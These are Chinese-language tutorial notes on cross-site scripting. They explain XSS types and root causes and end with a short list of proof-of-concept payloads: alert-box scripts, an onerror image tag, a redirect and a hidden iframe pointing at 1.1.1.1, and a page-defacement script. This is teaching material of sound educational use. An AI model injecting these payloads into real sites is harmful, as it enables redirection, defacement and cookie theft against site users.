检测
-
攻击WEB客户端
-
客户端脚本语言
-
弹窗告警、广告
-
Javascript
-
在浏览器中执行
-
XSS(cross-site scripting)
-
通过WEB站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击目的
-
注入客户端脚本代码
-
盗取cookie
-
重定向
-
VBScript , ActiveX, FLASH
JavaScritp
-
与Java语言无关
-
命名完全处于市场原因
-
使用最广的客户端脚本语言
使用场景
直接嵌入html:<script>alert('XSS');</script>元素标签事件:<body onload=alert('XSS')>图片标签:<img src="javascript:alert('XSS');">其他标签:<iframe>,<div>,<link>DOM对象,篡改页面内容
漏洞形成的根源
-
服务器对用户提交数据过滤不严
-
提交给服务器的脚本被直接返回给其他客户端执行
-
脚本在客户端执行恶意操作
XSS漏洞类型
-
存储型(持久型)
-
反射型(非持久)
-
DOM型
判断是否存在XSS漏洞,看看是否有返回值。
这样尝试在里面输入HTML代码也是可以被执行的
漏洞Poc
<script>alert('xss')</script>#弹出警告窗口
#插入图片如果存在图片就弹窗<img src=http://1.1.1.1/a.jpg onerror=alert('xss')>#重定向<script>window.location='http://1.1.1.1'</script><iframe SRC="http://1.1.1.1/sitemap" height ="0" width ="0"></iframe>#插入NIU BI的HTML页面<script>document.body.innerHTML="<div style=visibility:visible;><h1>NIU BI</h1></div>";</script>